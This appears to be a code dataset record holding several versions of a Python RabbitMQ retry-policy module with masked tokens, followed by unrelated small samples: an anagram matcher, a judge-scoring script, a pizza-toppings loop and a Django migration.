instance\n\n :attr:`retry_delays`: immutable list of retry backoff delays in seconds. Message\n is sent to dlx when this list is exhausted. e.g ``(1, 5, 10, 60, 5 * 60)``\n\n :attr:`retry_queue_suffix`: suffix str used when naming retry queues.\n \"\"\"\n\n def __init__(self, consumer, retry_delays, retry_queue_suffix='retry',\n **kwargs):\n \"\"\"\n :param Consumer consumer: message consumer instance\n\n :param Iterable[int] retry_delays: Immutable list of retry backoff delays in\n seconds. Message is sent to dlx when this list is exhausted.\n e.g ``(1, 5, 10, 60, 5 * 60)``\n\n :param: str retry_queue_suffix: suffix used when naming retry queues.\n \"\"\"\n assert len(retry_delays) > 0\n super(LimitedRetriesPolicy, self).__init__(consumer,\n retry_queue_suffix, **kwargs)\n self.retry_delays = retry_delays\n\n def retry(self, envelope):\n \"\"\"Send message to retry queue to retry handling it later.\n\n Death count is calculated by examining 'x-death' header. Based on the death\n count, the message is sent to a retry queue where it waits there till it\n expires and gets sent back to the original queue for handling retry.\n\n The death count is used as an index for `retry_delays` list. Where each\n item in the list represents a retry delay in seconds.\n\n The message will be rejected if the death count exceeded the length of\n `retry_delays` list.\n\n :param Envelope envelope: Message envelope\n \"\"\"\n death_count = self.get_death_count(envelope)\n if death_count < len(self.retry_delays):\n delay = self.retry_delays[death_count]\n retry_queue_name = self.declare_retry_queue(delay)\n if envelope.get_header('x-original-delivery-info') is None:\n self.set_original_delivery_info_header(envelope)\n self.consumer.channel.basic_publish(exchange='', routing_key=\n retry_queue_name, properties=envelope.properties, body=\n envelope.payload)\n self.consumer.channel.basic_ack(envelope.delivery_tag)\n logger.warning(\n 'Retry handling message [{}] after {}s; death count: {}'.\n format(envelope.message_id, delay, death_count + 1))\n else:\n logger.warning('Message [{}] exceeded retry limit; death count: {}'\n .format(envelope.message_id, death_count + 1))\n self.consumer.channel.basic_reject(envelope.delivery_tag,\n requeue=False)\n logger.error('Message [{}] is rejected'.format(envelope.message_id)\n )\n\n\nclass FixedDelayUnlimitedRetriesPolicy(UnlimitedRetriesPolicy):\n \"\"\"Fixed delay unlimited retries policy.\n\n This is an implementation of :class:`.RetryPolicy` which does fix backoff delay,\n unlimited retries.\n\n :attr:`consumer`: consumer instance\n\n :attr:`delay`: retry delay in seconds\n\n :attr:`retry_queue_suffix`: suffix str used when naming retry queues.\n \"\"\"\n\n def __init__(self, consumer, delay, retry_queue_suffix='retry', **kwargs):\n \"\"\"\n :param Consumer consumer: message consumer instance\n\n :param int delay: retry delay in seconds\n\n :param: str retry_queue_suffix: suffix used when naming retry queues.\n \"\"\"\n super(FixedDelayUnlimitedRetriesPolicy, self).__init__(consumer=\n consumer, initial_delay=delay, max_delay=delay,\n delay_incremented_by=0, retry_queue_suffix=retry_queue_suffix,\n **kwargs)\n\n\nclass FixedDelayLimitedRetriesPolicy(LimitedRetriesPolicy):\n \"\"\"Fixed delay limited retries policy.\n\n This is an implementation of :class:`.RetryPolicy` which does fix backoff delay,\n limited number of retries.\n\n :attr:`consumer`: consumer instance\n\n :attr:`delay`: retry delay in seconds.\n\n :attr:`retries_limit`: retries limit count.\n\n :attr:`retry_queue_suffix`: suffix str used when naming retry queues.\n \"\"\"\n\n def __init__(self, consumer, delay, retries_limit, retry_queue_suffix=\n 'retry', **kwargs):\n \"\"\"\n :param Consumer consumer: message consumer instance\n\n :param int delay: retry delay in seconds\n\n :param int retries_limit: retries limit count\n\n :param: str retry_queue_suffix: suffix used when naming retry queues.\n \"\"\"\n assert retries_limit > 0\n retry_delays = tuple([delay] * retries_limit)\n super(FixedDelayLimitedRetriesPolicy, self).__init__(consumer=\n consumer, retry_delays=retry_delays, retry_queue_suffix=\n retry_queue_suffix, **kwargs)\n",
"step-4": "<mask token>\n\n\nclass RetryPolicy(object):\n <mask token>\n\n def __init__(self, **kwargs):\n super(RetryPolicy, self).__init__()\n\n def retry(self, envelope):\n \"\"\"This method is implemented by the subclass.\"\"\"\n raise NotImplementedError()\n\n\nclass BaseRetryPolicy(RetryPolicy):\n \"\"\"Base retry policy class for :class:`.UnlimitedRetriesPolicy` and\n :class:`.LimitedRetriesPolicy`.\n\n It has implementation for geting mesage death count and retry queue creation.\n \"\"\"\n\n def __init__(self, consumer, retry_queue_suffix='retry', **kwargs):\n \"\"\"\n :param Consumer consumer: message consumer instance\n\n :param str retry_queue_suffix: Suffix used when creating retry queues. Retry\n queue names are constructed in this form \"queue_name.<suffix>.<delay>\".\n Optional, default to ``retry``\n \"\"\"\n super(BaseRetryPolicy, self).__init__(**kwargs)\n retry_queue_suffix = retry_queue_suffix.strip()\n self.consumer = consumer\n assert len(retry_queue_suffix) > 0\n self.retry_queue_suffix = retry_queue_suffix\n self.min_retry_queue_ttl = 20 * 1000\n\n def set_original_delivery_info_header(self, envelope):\n \"\"\"Save original message delivery infomation in a header.\"\"\"\n if not envelope.get_header('x-original-delivery-info'):\n original_delivery_info = {'consumer_tag': envelope.\n delivery_info.consumer_tag, 'delivery_tag': envelope.\n delivery_info.delivery_tag, 'redelivered': envelope.\n delivery_info.redelivered, 'exchange': envelope.\n delivery_info.exchange, 'routing_key': envelope.\n delivery_info.routing_key}\n envelope.set_header('x-original-delivery-info',\n original_delivery_info)\n\n def get_death_count(self, envelope):\n \"\"\"Return the death count of a message by examining \"x-death\" header.\n\n :param Envelope envelope: Message envelope\n\n :return int: death count\n \"\"\"\n death_header = envelope.get_header('x-death')\n if death_header is None:\n return 0\n count = 0\n for death in death_header:\n if not death['queue'].startswith(self.consumer.queue_name):\n continue\n count += death.get('count', 1)\n return count\n\n def declare_retry_queue(self, delay):\n \"\"\"Declare a retry queue for the provided delay.\n\n Each different delay has a different queue where all retry messages with the\n same delay will be sent to till they expire and get sent back to the original\n queue for handling retry. The queue is declared with a TTL and automatically\n gets deleted. The queue TTL is equal to the provided delay. The retry\n queue's dead letter exchange is (default) direct exchange and the dead letter\n routing key is the original queue name where the messages originally\n came from. The messages will be sent back to the original queue when they\n reach their TTL, for handling retry.\n\n The retry queue is redeclared before every a new message is sent to it.\n Redeclaration resets the queue's TTL, preventing it from being destroyed.\n\n\n :param int delay: Retry delay in seconds\n\n :return: retry queue name\n :rtype: str\n \"\"\"\n delay_in_ms = int(delay * 1000)\n retry_queue_name = '{}.{}.{}'.format(self.consumer.queue_name, self\n .retry_queue_suffix, delay_in_ms)\n queue_ttl = delay_in_ms * 2\n if queue_ttl < self.min_retry_queue_ttl:\n queue_ttl = self.min_retry_queue_ttl\n self.consumer.channel.queue_declare(callback=None, queue=\n retry_queue_name, durable=self.consumer.durable, nowait=True,\n arguments={'x-dead-letter-exchange': '',\n 'x-dead-letter-routing-key': self.consumer.queue_name,\n 'x-message-ttl': delay_in_ms, 'x-expires': queue_ttl})\n logger.warning('Retry queue \"{}\" is created/redeclared'.format(\n retry_queue_name))\n return retry_queue_name\n\n\nclass UnlimitedRetriesPolicy(BaseRetryPolicy):\n \"\"\"Unlimited Retries Policy.\n\n This is an implementation of :class:`.RetryPolicy` which does incremental backoff,\n unlimited retries.\n\n :attr:`initial_delay`: is the initial/first backoff delay in seconds\n\n :attr:`delay_incremented_by`: is number of seconds the backoff should be incremented\n by after each death\n\n :attr:`max_delay`: is the final/maximum backoff delay in seconds that should net be\n exceeded\n \"\"\"\n\n def __init__(self, consumer, initial_delay, max_delay,\n delay_incremented_by, retry_queue_suffix='retry', **kwargs):\n \"\"\"\n :param Consumer consumer: message consumer instance\n\n :param int initial_delay: `initial_delay` is the initial/first backoff delay\n in seconds.\n\n :param int max_delay: `max_delay` is the final/maximum backoff delay in seconds\n that should net be exceeded. When exceeded, this max is used.\n\n :param int delay_incremented_by: `delay_incremented_by` is number of seconds\n the backoff should be incremented by after each death.\n\n :param: str retry_queue_suffix: suffix used when naming retry queues.\n \"\"\"\n super(UnlimitedRetriesPolicy, self).__init__(consumer,\n retry_queue_suffix, **kwargs)\n assert initial_delay >= 0\n assert delay_incremented_by >= 0\n assert max_delay >= initial_delay\n self.initial_delay = initial_delay\n self.max_delay = max_delay\n self.delay_incremented_by = delay_incremented_by\n\n def retry(self, envelope):\n \"\"\"Send message to retry queue to retry handling it later.\n\n Death count is calculated by examining 'x-death' header. Based on the death\n count, the message is sent to a retry queue where it waits there till it\n expires and gets sent back to the original queue for handling retry.\n\n :param Envelope envelope: Message envelope\n \"\"\"\n death_count = self.get_death_count(envelope)\n delay = self.initial_delay + death_count * self.delay_incremented_by\n if delay > self.max_delay:\n delay = self.max_delay\n retry_queue_name = self.declare_retry_queue(delay)\n if envelope.get_header('x-original-delivery-info') is None:\n self.set_original_delivery_info_header(envelope)\n self.consumer.channel.basic_publish(exchange='', routing_key=\n retry_queue_name, properties=envelope.properties, body=envelope\n .payload)\n self.consumer.channel.basic_ack(envelope.delivery_tag)\n logger.warning('Retry handling message [{}] after {}s; death count: {}'\n .format(envelope.message_id, delay, death_count + 1))\n\n\nclass LimitedRetriesPolicy(BaseRetryPolicy):\n \"\"\"Limited Retries Policy.\n\n This is an implementation of :class:`.RetryPolicy` which does incremental backoff,\n limited number of retries.\n\n :attr:`consumer`: message consumer instance\n\n :attr:`retry_delays`: immutable list of retry backoff delays in seconds. Message\n is sent to dlx when this list is exhausted. e.g ``(1, 5, 10, 60, 5 * 60)``\n\n :attr:`retry_queue_suffix`: suffix str used when naming retry queues.\n \"\"\"\n\n def __init__(self, consumer, retry_delays, retry_queue_suffix='retry',\n **kwargs):\n \"\"\"\n :param Consumer consumer: message consumer instance\n\n :param Iterable[int] retry_delays: Immutable list of retry backoff delays in\n seconds. Message is sent to dlx when this list is exhausted.\n e.g ``(1, 5, 10, 60, 5 * 60)``\n\n :param: str retry_queue_suffix: suffix used when naming retry queues.\n \"\"\"\n assert len(retry_delays) > 0\n super(LimitedRetriesPolicy, self).__init__(consumer,\n retry_queue_suffix, **kwargs)\n self.retry_delays = retry_delays\n\n def retry(self, envelope):\n \"\"\"Send message to retry queue to retry handling it later.\n\n Death count is calculated by examining 'x-death' header. Based on the death\n count, the message is sent to a retry queue where it waits there till it\n expires and gets sent back to the original queue for handling retry.\n\n The death count is used as an index for `retry_delays` list. Where each\n item in the list represents a retry delay in seconds.\n\n The message will be rejected if the death count exceeded the length of\n `retry_delays` list.\n\n :param Envelope envelope: Message envelope\n \"\"\"\n death_count = self.get_death_count(envelope)\n if death_count < len(self.retry_delays):\n delay = self.retry_delays[death_count]\n retry_queue_name = self.declare_retry_queue(delay)\n if envelope.get_header('x-original-delivery-info') is None:\n self.set_original_delivery_info_header(envelope)\n self.consumer.channel.basic_publish(exchange='', routing_key=\n retry_queue_name, properties=envelope.properties, body=\n envelope.payload)\n self.consumer.channel.basic_ack(envelope.delivery_tag)\n logger.warning(\n 'Retry handling message [{}] after {}s; death count: {}'.\n format(envelope.message_id, delay, death_count + 1))\n else:\n logger.warning('Message [{}] exceeded retry limit; death count: {}'\n .format(envelope.message_id, death_count + 1))\n self.consumer.channel.basic_reject(envelope.delivery_tag,\n requeue=False)\n logger.error('Message [{}] is rejected'.format(envelope.message_id)\n )\n\n\nclass FixedDelayUnlimitedRetriesPolicy(UnlimitedRetriesPolicy):\n \"\"\"Fixed delay unlimited retries policy.\n\n This is an implementation of :class:`.RetryPolicy` which does fix backoff delay,\n unlimited retries.\n\n :attr:`consumer`: consumer instance\n\n :attr:`delay`: retry delay in seconds\n\n :attr:`retry_queue_suffix`: suffix str used when naming retry queues.\n \"\"\"\n\n def __init__(self, consumer, delay, retry_queue_suffix='retry', **kwargs):\n \"\"\"\n :param Consumer consumer: message consumer instance\n\n :param int delay: retry delay in seconds\n\n :param: str retry_queue_suffix: suffix used when naming retry queues.\n \"\"\"\n super(FixedDelayUnlimitedRetriesPolicy, self).__init__(consumer=\n consumer, initial_delay=delay, max_delay=delay,\n delay_incremented_by=0, retry_queue_suffix=retry_queue_suffix,\n **kwargs)\n\n\nclass FixedDelayLimitedRetriesPolicy(LimitedRetriesPolicy):\n \"\"\"Fixed delay limited retries policy.\n\n This is an implementation of :class:`.RetryPolicy` which does fix backoff delay,\n limited number of retries.\n\n :attr:`consumer`: consumer instance\n\n :attr:`delay`: retry delay in seconds.\n\n :attr:`retries_limit`: retries limit count.\n\n :attr:`retry_queue_suffix`: suffix str used when naming retry queues.\n \"\"\"\n\n def __init__(self, consumer, delay, retries_limit, retry_queue_suffix=\n 'retry', **kwargs):\n \"\"\"\n :param Consumer consumer: message consumer instance\n\n :param int delay: retry delay in seconds\n\n :param int retries_limit: retries limit count\n\n :param: str retry_queue_suffix: suffix used when naming retry queues.\n \"\"\"\n assert retries_limit > 0\n retry_delays = tuple([delay] * retries_limit)\n super(FixedDelayLimitedRetriesPolicy, self).__init__(consumer=\n consumer, retry_delays=retry_delays, retry_queue_suffix=\n retry_queue_suffix, **kwargs)\n",
"step-5": "# -*- coding: utf-8 -*-\n\"\"\"\nNoting is perfect, errors and timeouts may happen, and when such failures happen, the\nconsumer has to decide what to do with that. By default, the consumer would reject the\nenvelope (RabbitMQ message) when a failure happens. However, errors and timeouts\nissues, unless there is a software bug, usually solved with retries. Just like the\nrouting, the consumer doesn't make the retry decision itself, the consumer delegates\nit to a retry policy. Retry policy defines how the retry is performed. Retries\nusually happens with back-offs to avoid worsening the situation by hammering other\nservices with more requests, especially if it was a timeout issue. The consumer can be\nconfigured to use a retry policy by calling :meth:`.Consumer.set_retry_policy`, passing\nan instance of :class:`.RetryPolicy`. When a retry policy is set, the consumer won't\nreject messages, but rather, it send them to the retry policy to deal with the\nsituation by invoking :meth:`.RetryPolicy.retry` method. Based on it's implementation,\nThe retry policy decides how to do retries.\n\nThere are 4 different retry policies available:\n\n1. :class:`.UnlimitedRetriesPolicy`, Unlimited retries policy\n2. :class:`.LimitedRetriesPolicy`, Limited retries policy\n3. :class:`.FixedDelayUnlimitedRetriesPolicy`, Fixed delay unlimited retries policy\n4. :class:`.FixedDelayLimitedRetriesPolicy`, Fixed delay limited retries policy\n\nCustom retry policies can be created by implementing the base class\n:class:`.RetryPolicy`\n\"\"\"\nimport logging\n\nlogger = logging.getLogger(__name__)\n\n\nclass RetryPolicy(object):\n \"\"\"Base class for retry policies.\n\n Subclasses MUST implement :meth:`retry` method.\n \"\"\"\n\n def __init__(self, **kwargs):\n # type: (RetryPolicy) -> None\n super(RetryPolicy, self).__init__()\n\n def retry(self, envelope):\n # type: (RetryPolicy, Envelope) -> None\n \"\"\"This method is implemented by the subclass.\"\"\"\n raise NotImplementedError()\n\n\nclass BaseRetryPolicy(RetryPolicy):\n \"\"\"Base retry policy class for :class:`.UnlimitedRetriesPolicy` and\n :class:`.LimitedRetriesPolicy`.\n\n It has implementation for geting mesage death count and retry queue creation.\n \"\"\"\n\n def __init__(self, consumer, retry_queue_suffix='retry', **kwargs):\n # type: (BaseRetryPolicy, Consumer, str) -> None\n \"\"\"\n :param Consumer consumer: message consumer instance\n\n :param str retry_queue_suffix: Suffix used when creating retry queues. Retry\n queue names are constructed in this form \"queue_name.<suffix>.<delay>\".\n Optional, default to ``retry``\n \"\"\"\n super(BaseRetryPolicy, self).__init__(**kwargs)\n retry_queue_suffix = retry_queue_suffix.strip()\n self.consumer = consumer\n assert len(retry_queue_suffix) > 0\n self.retry_queue_suffix = retry_queue_suffix\n # To avoid frequent retry queue create and destroy for low retry delays\n self.min_retry_queue_ttl = 20 * 1000 # 20 seconds\n\n def set_original_delivery_info_header(self, envelope):\n # type: (BaseRetryPolicy, Envelope) -> None\n \"\"\"Save original message delivery infomation in a header.\"\"\"\n if not envelope.get_header('x-original-delivery-info'):\n original_delivery_info = {\n 'consumer_tag': envelope.delivery_info.consumer_tag,\n 'delivery_tag': envelope.delivery_info.delivery_tag,\n 'redelivered': envelope.delivery_info.redelivered,\n 'exchange': envelope.delivery_info.exchange,\n 'routing_key': envelope.delivery_info.routing_key\n }\n envelope.set_header('x-original-delivery-info',\n original_delivery_info)\n\n def get_death_count(self, envelope):\n # type: (BaseRetryPolicy, Envelope) -> int\n \"\"\"Return the death count of a message by examining \"x-death\" header.\n\n :param Envelope envelope: Message envelope\n\n :return int: death count\n \"\"\"\n death_header = envelope.get_header('x-death')\n\n if death_header is None:\n return 0\n\n count = 0\n for death in death_header:\n if not death['queue'].startswith(self.consumer.queue_name):\n continue\n count += death.get('count', 1)\n return count\n\n def declare_retry_queue(self, delay):\n # type: (BaseRetryPolicy, int) -> str\n \"\"\"Declare a retry queue for the provided delay.\n\n Each different delay has a different queue where all retry messages with the\n same delay will be sent to till they expire and get sent back to the original\n queue for handling retry. The queue is declared with a TTL and automatically\n gets deleted. The queue TTL is equal to the provided delay. The retry\n queue's dead letter exchange is (default) direct exchange and the dead letter\n routing key is the original queue name where the messages originally\n came from. The messages will be sent back to the original queue when they\n reach their TTL, for handling retry.\n\n The retry queue is redeclared before every a new message is sent to it.\n Redeclaration resets the queue's TTL, preventing it from being destroyed.\n\n\n :param int delay: Retry delay in seconds\n\n :return: retry queue name\n :rtype: str\n \"\"\"\n\n delay_in_ms = int(delay * 1000)\n retry_queue_name = '{}.{}.{}'.format(\n self.consumer.queue_name, self.retry_queue_suffix, delay_in_ms)\n\n # To avoid frequent queue create and destroy for low retry delays\n queue_ttl = delay_in_ms * 2\n if queue_ttl < self.min_retry_queue_ttl:\n queue_ttl = self.min_retry_queue_ttl\n\n self.consumer.channel.queue_declare(\n callback=None,\n queue=retry_queue_name,\n durable=self.consumer.durable,\n nowait=True,\n arguments={\n 'x-dead-letter-exchange': '',\n 'x-dead-letter-routing-key': self.consumer.queue_name,\n 'x-message-ttl': delay_in_ms,\n 'x-expires': queue_ttl\n })\n logger.warning(\n 'Retry queue \"{}\" is created/redeclared'.format(retry_queue_name))\n return retry_queue_name\n\n\nclass UnlimitedRetriesPolicy(BaseRetryPolicy):\n \"\"\"Unlimited Retries Policy.\n\n This is an implementation of :class:`.RetryPolicy` which does incremental backoff,\n unlimited retries.\n\n :attr:`initial_delay`: is the initial/first backoff delay in seconds\n\n :attr:`delay_incremented_by`: is number of seconds the backoff should be incremented\n by after each death\n\n :attr:`max_delay`: is the final/maximum backoff delay in seconds that should net be\n exceeded\n \"\"\"\n\n def __init__(self,\n consumer,\n initial_delay,\n max_delay,\n delay_incremented_by,\n retry_queue_suffix='retry',\n **kwargs):\n # type: (UnlimitedRetriesPolicy, Consumer, int, int, int, str) -> None\n \"\"\"\n :param Consumer consumer: message consumer instance\n\n :param int initial_delay: `initial_delay` is the initial/first backoff delay\n in seconds.\n\n :param int max_delay: `max_delay` is the final/maximum backoff delay in seconds\n that should net be exceeded. When exceeded, this max is used.\n\n :param int delay_incremented_by: `delay_incremented_by` is number of seconds\n the backoff should be incremented by after each death.\n\n :param: str retry_queue_suffix: suffix used when naming retry queues.\n \"\"\"\n super(UnlimitedRetriesPolicy,\n self).__init__(consumer, retry_queue_suffix, **kwargs)\n\n assert initial_delay >= 0\n assert delay_incremented_by >= 0\n assert max_delay >= initial_delay\n\n self.initial_delay = initial_delay\n self.max_delay = max_delay\n self.delay_incremented_by = delay_incremented_by\n\n def retry(self, envelope):\n # type: (UnlimitedRetriesPolicy, Envelope) -> None\n \"\"\"Send message to retry queue to retry handling it later.\n\n Death count is calculated by examining 'x-death' header. Based on the death\n count, the message is sent to a retry queue where it waits there till it\n expires and gets sent back to the original queue for handling retry.\n\n :param Envelope envelope: Message envelope\n \"\"\"\n death_count = self.get_death_count(envelope)\n delay = self.initial_delay + (death_count * self.delay_incremented_by)\n\n if delay > self.max_delay:\n delay = self.max_delay\n\n retry_queue_name = self.declare_retry_queue(delay)\n\n # Save original delivery information\n if envelope.get_header('x-original-delivery-info') is None:\n self.set_original_delivery_info_header(envelope)\n\n self.consumer.channel.basic_publish(\n exchange='',\n routing_key=retry_queue_name,\n properties=envelope.properties,\n body=envelope.payload)\n\n self.consumer.channel.basic_ack(envelope.delivery_tag)\n logger.warning(\n 'Retry handling message [{}] after {}s; death count: {}'.format(\n envelope.message_id, delay, death_count + 1))\n\n\nclass LimitedRetriesPolicy(BaseRetryPolicy):\n \"\"\"Limited Retries Policy.\n\n This is an implementation of :class:`.RetryPolicy` which does incremental backoff,\n limited number of retries.\n\n :attr:`consumer`: message consumer instance\n\n :attr:`retry_delays`: immutable list of retry backoff delays in seconds. Message\n is sent to dlx when this list is exhausted. e.g ``(1, 5, 10, 60, 5 * 60)``\n\n :attr:`retry_queue_suffix`: suffix str used when naming retry queues.\n \"\"\"\n\n def __init__(self,\n consumer,\n retry_delays,\n retry_queue_suffix='retry',\n **kwargs):\n # type: (LimitedRetriesPolicy, Consumer, Iterable[int], str) -> None\n \"\"\"\n :param Consumer consumer: message consumer instance\n\n :param Iterable[int] retry_delays: Immutable list of retry backoff delays in\n seconds. Message is sent to dlx when this list is exhausted.\n e.g ``(1, 5, 10, 60, 5 * 60)``\n\n :param: str retry_queue_suffix: suffix used when naming retry queues.\n \"\"\"\n assert len(retry_delays) > 0\n super(LimitedRetriesPolicy, self).__init__(consumer, retry_queue_suffix,\n **kwargs)\n self.retry_delays = retry_delays\n\n def retry(self, envelope):\n # type: (LimitedRetriesPolicy, Envelope) -> None\n \"\"\"Send message to retry queue to retry handling it later.\n\n Death count is calculated by examining 'x-death' header. Based on the death\n count, the message is sent to a retry queue where it waits there till it\n expires and gets sent back to the original queue for handling retry.\n\n The death count is used as an index for `retry_delays` list. Where each\n item in the list represents a retry delay in seconds.\n\n The message will be rejected if the death count exceeded the length of\n `retry_delays` list.\n\n :param Envelope envelope: Message envelope\n \"\"\"\n death_count = self.get_death_count(envelope)\n if death_count < len(self.retry_delays):\n delay = self.retry_delays[death_count]\n retry_queue_name = self.declare_retry_queue(delay)\n\n # Save original delivery information\n if envelope.get_header('x-original-delivery-info') is None:\n self.set_original_delivery_info_header(envelope)\n\n self.consumer.channel.basic_publish(\n exchange='',\n routing_key=retry_queue_name,\n properties=envelope.properties,\n body=envelope.payload)\n\n self.consumer.channel.basic_ack(envelope.delivery_tag)\n logger.warning(\n 'Retry handling message [{}] after {}s; death count: {}'.format(\n envelope.message_id, delay, death_count + 1))\n else:\n logger.warning(\n 'Message [{}] exceeded retry limit; death count: {}'.format(\n envelope.message_id, death_count + 1))\n self.consumer.channel.basic_reject(\n envelope.delivery_tag, requeue=False)\n logger.error('Message [{}] is rejected'.format(envelope.message_id))\n\n\nclass FixedDelayUnlimitedRetriesPolicy(UnlimitedRetriesPolicy):\n \"\"\"Fixed delay unlimited retries policy.\n\n This is an implementation of :class:`.RetryPolicy` which does fix backoff delay,\n unlimited retries.\n\n :attr:`consumer`: consumer instance\n\n :attr:`delay`: retry delay in seconds\n\n :attr:`retry_queue_suffix`: suffix str used when naming retry queues.\n \"\"\"\n\n def __init__(self, consumer, delay, retry_queue_suffix='retry', **kwargs):\n # type: (FixedDelayUnlimitedRetriesPolicy, Consumer, int, str) -> None\n \"\"\"\n :param Consumer consumer: message consumer instance\n\n :param int delay: retry delay in seconds\n\n :param: str retry_queue_suffix: suffix used when naming retry queues.\n \"\"\"\n super(FixedDelayUnlimitedRetriesPolicy, self).__init__(\n consumer=consumer,\n initial_delay=delay,\n max_delay=delay,\n delay_incremented_by=0,\n retry_queue_suffix=retry_queue_suffix,\n **kwargs)\n\n\nclass FixedDelayLimitedRetriesPolicy(LimitedRetriesPolicy):\n \"\"\"Fixed delay limited retries policy.\n\n This is an implementation of :class:`.RetryPolicy` which does fix backoff delay,\n limited number of retries.\n\n :attr:`consumer`: consumer instance\n\n :attr:`delay`: retry delay in seconds.\n\n :attr:`retries_limit`: retries limit count.\n\n :attr:`retry_queue_suffix`: suffix str used when naming retry queues.\n \"\"\"\n\n def __init__(self,\n consumer,\n delay,\n retries_limit,\n retry_queue_suffix='retry',\n **kwargs):\n # type: (FixedDelayLimitedRetriesPolicy, Consumer, int, int, str) -> None\n \"\"\"\n :param Consumer consumer: message consumer instance\n\n :param int delay: retry delay in seconds\n\n :param int retries_limit: retries limit count\n\n :param: str retry_queue_suffix: suffix used when naming retry queues.\n \"\"\"\n assert retries_limit > 0\n retry_delays = tuple([delay] * retries_limit)\n super(FixedDelayLimitedRetriesPolicy, self).__init__(\n consumer=consumer,\n retry_delays=retry_delays,\n retry_queue_suffix=retry_queue_suffix,\n **kwargs)\n",
"step-ids": [
9,
13,
15,
23,
27
]
}
|
[
9,
13,
15,
23,
27
] |
class Anagram(object):
def __init__(self, word):
self.word = word
self.canonical = self._canonicalize(word)
def _canonicalize(self, word):
return sorted(word.lower())
def _is_anagram(self, word):
return word != self.word and self._canonicalize(word) == self.canonical
def match(self, words):
return filter(self._is_anagram, words)
|
normal
|
{
"blob_id": "44224985dbfa6234eff406149ce25e1d00b512e9",
"index": 620,
"step-1": "class Anagram(object):\n <mask token>\n <mask token>\n <mask token>\n\n def match(self, words):\n return filter(self._is_anagram, words)\n",
"step-2": "class Anagram(object):\n\n def __init__(self, word):\n self.word = word\n self.canonical = self._canonicalize(word)\n <mask token>\n <mask token>\n\n def match(self, words):\n return filter(self._is_anagram, words)\n",
"step-3": "class Anagram(object):\n\n def __init__(self, word):\n self.word = word\n self.canonical = self._canonicalize(word)\n <mask token>\n\n def _is_anagram(self, word):\n return word != self.word and self._canonicalize(word) == self.canonical\n\n def match(self, words):\n return filter(self._is_anagram, words)\n",
"step-4": "class Anagram(object):\n\n def __init__(self, word):\n self.word = word\n self.canonical = self._canonicalize(word)\n\n def _canonicalize(self, word):\n return sorted(word.lower())\n\n def _is_anagram(self, word):\n return word != self.word and self._canonicalize(word) == self.canonical\n\n def match(self, words):\n return filter(self._is_anagram, words)\n",
"step-5": null,
"step-ids": [
2,
3,
4,
5
]
}
|
[
2,
3,
4,
5
] |
# 赛场统分
# 【问题】在编程竞赛中,有10个评委为参赛的选手打分,分数为0 ~ 100分。
# 选手最后得分为:去掉一个最高分和一个最低分后其余8个分数的平均值。请编写一个程序实现。
sc_lst = []
i = 1
while len(sc_lst) < 10:
try:
sc = int(input('请第%d位评委打分:' % i))
if sc > 0 and sc < 101:
sc_lst.append(sc)
i += 1
else:
print('超出范围,输入无效')
except:
print('请输入1-100以内的数字')
max_sc = max(sc_lst)
min_sc = min(sc_lst)
sc_lst.remove(max_sc)
sc_lst.remove(min_sc)
ave_sc = sum(sc_lst) / len(sc_lst)
print('去除最高分%d,最低分%d,平均分为%d' % (max_sc, min_sc, ave_sc))
print('end')
|
normal
|
{
"blob_id": "a17abd3947a946daf2c453c120f2e79d2ba60778",
"index": 901,
"step-1": "<mask token>\n",
"step-2": "<mask token>\nwhile len(sc_lst) < 10:\n try:\n sc = int(input('请第%d位评委打分:' % i))\n if sc > 0 and sc < 101:\n sc_lst.append(sc)\n i += 1\n else:\n print('超出范围,输入无效')\n except:\n print('请输入1-100以内的数字')\n<mask token>\nsc_lst.remove(max_sc)\nsc_lst.remove(min_sc)\n<mask token>\nprint('去除最高分%d,最低分%d,平均分为%d' % (max_sc, min_sc, ave_sc))\nprint('end')\n",
"step-3": "sc_lst = []\ni = 1\nwhile len(sc_lst) < 10:\n try:\n sc = int(input('请第%d位评委打分:' % i))\n if sc > 0 and sc < 101:\n sc_lst.append(sc)\n i += 1\n else:\n print('超出范围,输入无效')\n except:\n print('请输入1-100以内的数字')\nmax_sc = max(sc_lst)\nmin_sc = min(sc_lst)\nsc_lst.remove(max_sc)\nsc_lst.remove(min_sc)\nave_sc = sum(sc_lst) / len(sc_lst)\nprint('去除最高分%d,最低分%d,平均分为%d' % (max_sc, min_sc, ave_sc))\nprint('end')\n",
"step-4": "# 赛场统分\n# 【问题】在编程竞赛中,有10个评委为参赛的选手打分,分数为0 ~ 100分。\n# 选手最后得分为:去掉一个最高分和一个最低分后其余8个分数的平均值。请编写一个程序实现。\n\nsc_lst = []\ni = 1\nwhile len(sc_lst) < 10:\n try:\n sc = int(input('请第%d位评委打分:' % i))\n if sc > 0 and sc < 101:\n sc_lst.append(sc)\n i += 1\n else:\n print('超出范围,输入无效')\n except:\n print('请输入1-100以内的数字')\n\nmax_sc = max(sc_lst)\nmin_sc = min(sc_lst)\nsc_lst.remove(max_sc)\nsc_lst.remove(min_sc)\nave_sc = sum(sc_lst) / len(sc_lst)\nprint('去除最高分%d,最低分%d,平均分为%d' % (max_sc, min_sc, ave_sc))\nprint('end')\n",
"step-5": null,
"step-ids": [
0,
1,
2,
3
]
}
|
[
0,
1,
2,
3
] |
"""
7-4. Pizza Toppings: Write a loop that prompts the user to enter a series of
pizza toppings until they enter a 'quit' value. As they enter each topping,
print a message saying you’ll add that topping to their pizza.
"""
if __name__ == '__main__':
topping = None
while topping != "quit":
if topping:
print("I'll add %s to your pizza!" % topping)
topping = input("What topping would you like? (enter 'quit' when you are done.) ")
|
normal
|
{
"blob_id": "4d07795543989fe481e1141756f988d276f82c02",
"index": 5348,
"step-1": "<mask token>\n",
"step-2": "<mask token>\nif __name__ == '__main__':\n topping = None\n while topping != 'quit':\n if topping:\n print(\"I'll add %s to your pizza!\" % topping)\n topping = input(\n \"What topping would you like? (enter 'quit' when you are done.) \")\n",
"step-3": "\"\"\"\n7-4. Pizza Toppings: Write a loop that prompts the user to enter a series of\npizza toppings until they enter a 'quit' value. As they enter each topping,\nprint a message saying you’ll add that topping to their pizza.\n\"\"\"\nif __name__ == '__main__':\n topping = None\n while topping != \"quit\":\n if topping:\n print(\"I'll add %s to your pizza!\" % topping)\n topping = input(\"What topping would you like? (enter 'quit' when you are done.) \")",
"step-4": null,
"step-5": null,
"step-ids": [
0,
1,
2
]
}
|
[
0,
1,
2
] |
# Generated by Django 2.2 on 2019-05-13 06:57
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('base_data_app', '0008_key_keyslider'),
]
operations = [
migrations.AddField(
model_name='key',
name='image',
field=models.ImageField(null=True, upload_to='key', verbose_name='Картинка'),
),
]
|
